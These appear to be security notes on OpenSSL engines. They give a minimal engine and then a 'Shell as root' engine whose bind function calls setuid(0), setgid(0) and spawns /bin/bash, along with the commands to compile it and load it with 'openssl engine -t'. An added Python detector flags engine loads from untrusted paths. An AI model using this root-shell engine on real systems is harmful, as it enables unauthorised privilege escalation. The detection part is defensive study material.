# OpenSSL Engine
* Engines hook external libraries (shared objects) into OpenSSL
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
* Most minimal example
```C
#include <openssl/engine.h>

/* Called when the engine is loaded; returning 1 signals success */
static int bind(ENGINE *e, const char *id)
{
    return 1;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Shell as root
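```C
#include <openssl/engine.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs inside the openssl process as soon as the engine is loaded */
static int bind(ENGINE *e, const char *id)
{
    /* Succeeds only if the openssl process already has root privileges */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 1;
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```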
* Compile
```sh
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so rootshell.o -lcrypto
```
* Execute via
```sh
openssl engine -t `pwd`/rootshell.so
```
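* Detect engine loads from untrusted paths (added example, not part of the original notes): it scans process-execution records for `openssl` commands that name a shared object outside the system engine directories. The record format, the sample events and the `TRUSTED_ENGINE_DIRS` values are assumptions.

```python
import posixpath
import shlex

# Assumption: where legitimate engine modules live on this host
# (`openssl version -e` prints the real ENGINESDIR).
TRUSTED_ENGINE_DIRS = ("/usr/lib/x86_64-linux-gnu/engines-3", "/usr/lib64/engines-3")

# Constructed sample records: (effective uid, working directory, command line).
SAMPLE_EVENTS = [
    (0, "/tmp/build", "openssl engine -t /tmp/build/rootshell.so"),
    (0, "/root", "openssl x509 -in cert.pem -noout -text"),
    (1000, "/home/dev", "/usr/bin/openssl engine -t ./test.so"),
    (0, "/root", "openssl engine -t /usr/lib/x86_64-linux-gnu/engines-3/afalg.so"),
    (0, "/root", "openssl engine -t"),
]


def engine_path_args(cwd, cmdline):
    """Return normalized paths of shared objects named on an openssl command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the log record
        argv = cmdline.split()
    if not argv or posixpath.basename(argv[0]) != "openssl":
        return []
    # normpath collapses "." and ".." but cannot resolve symlinks from a log line.
    return [posixpath.normpath(posixpath.join(cwd, arg))
            for arg in argv[1:] if "/" in arg and arg.endswith(".so")]


def is_trusted(path):
    """True if the path lies inside one of the trusted engine directories."""
    return any(path.startswith(d.rstrip("/") + "/") for d in TRUSTED_ENGINE_DIRS)


def find_suspicious_engine_loads(events):
    """Flag openssl runs that reference a shared object outside the trusted dirs."""
    findings = []
    for euid, cwd, cmdline in events:
        for path in engine_path_args(cwd, cmdline):
            if not is_trusted(path):
                findings.append({"euid": euid, "privileged": euid == 0,
                                 "path": path, "cmdline": cmdline})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_engine_loads(SAMPLE_EVENTS):
        print(finding)
```

Findings with `privileged` set are the ones to triage first, since the engine's bind function runs with the privileges of the `openssl` process.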